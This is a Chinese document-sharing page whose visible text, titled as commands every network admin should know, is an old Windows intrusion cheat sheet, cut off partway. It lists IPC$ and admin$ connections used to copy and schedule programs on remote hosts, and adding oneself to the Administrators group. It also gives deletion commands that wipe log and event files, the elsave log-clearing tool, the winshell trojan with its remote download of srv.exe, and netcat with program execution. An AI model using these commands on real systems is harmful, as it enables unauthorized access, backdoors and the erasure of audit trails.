网管必须知道的命令.docVIP

  1. 1、本文档共11页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网管必须知道的命令

网管必须知道的命令 常用的几条NET命令:? ==================================================? (与远程主机建立空管连接)?net?use?\\IP地址\ipc$??/use:? (以管理员身份登录远程主机)?net?use?\\IP地址\ipc$?密码?/use:Administrator? (传送文件到远程主机WINNT目录下)copy?本机目录路径\程序?\\IP地址\admin$? (查看远程主机时间)?net?time?\\IP地址? (定时启动某个程序)?at?\\IP地址?02:18?readme.exe? (查看共享)?net?view?\\IP地址? (查看netbios工作组列表)?nbtstat?-A?IP地址? (将远程主机C盘映射为自己的F盘)?net?use?f:?\\IP地址\c$?/user:Administrator? (这两条把自己增加到管理员组):?net?user?用户名?密码?/add? net?localgroup?Administrators?用户名?/add? (断开连接)?net?use?\\IP地址\ipc$?/delete? =====================================================? 擦屁屁:? del?C:\winnt\system32\logfiles\*.*? del?C:\winnt\system32\config\*.evt? del?C:\winnt\system32\dtclog\*.*? del?C:\winnt\system32\*.log? del?C:\winnt\system32\*.txt? del?C:\winnt\*.txt? del?C:\winnt\*.log? ============================? 一、netsvc.exe? 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:? netsvc?/list?\\IP地址? netsvc?schedule?\\IP地址?/query? netsvc?\\IP地址?schedule?/start? 二、OpenTelnet.exe? 远程启动主机的Telnet服务,并绑定端口到7878,例如:? OpenTelnet?\\IP地址?用户名?密码?1?7878? 然后就可以telnet到主机的7878端口,进入DOS方式下:? telnet?IP地址?7878? 三、winshell.exe? 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:? p?Path?(查看winshell主程序的路径信息)? b?reBoot?(重新启动机器)? d?shutDown?(关闭机器)? s?Shell?(执行后你就会看到可爱的“C:\”)? x?eXit?(退出本次登录会话,此命令并不终止winshell的运行)? CMD?http://.../srv.exe?(通过http下载其他网站上的文件到运行winshell的机器上)? 四、3389登陆器,GUI方式登录远程主机的? 五、elsave.exe? 事件日志清除工具? elsave?-s?\\IP地址?-l?application?-C? elsave?-s?\\IP地址?-l?system?-C? elsave?-s?\\IP地址?-l?security?-C? 执行后成功清除应用程序日志,系统日志,安全日志? 六、hbulot.exe? 开启win2kserver和winxp的3389服务? hbulot?[/r]? 使用/r表示安装完成后自动重起目标使设置生效。? 七、nc.exe(netcat.exe)? 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。? 想要连接到某处:?nc?[-options]?hostname?port[s]?[ports]?...? 绑定端口等待连接:?nc?-l?-p?port?[-options]?[hostname]?[port]? 参数:? -e?prog?程序重定向,一旦连接,就执行?[危险!!]? -g?gateway?source-routing?hop?point[s],?up?to?8? -G?num?source-routing?pointer:?4,?8,?12,?...? -h?帮助信息? -i?secs?延时的间隔? -l?监听模式,

您可能关注的文档

文档评论(0)

yan698698 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档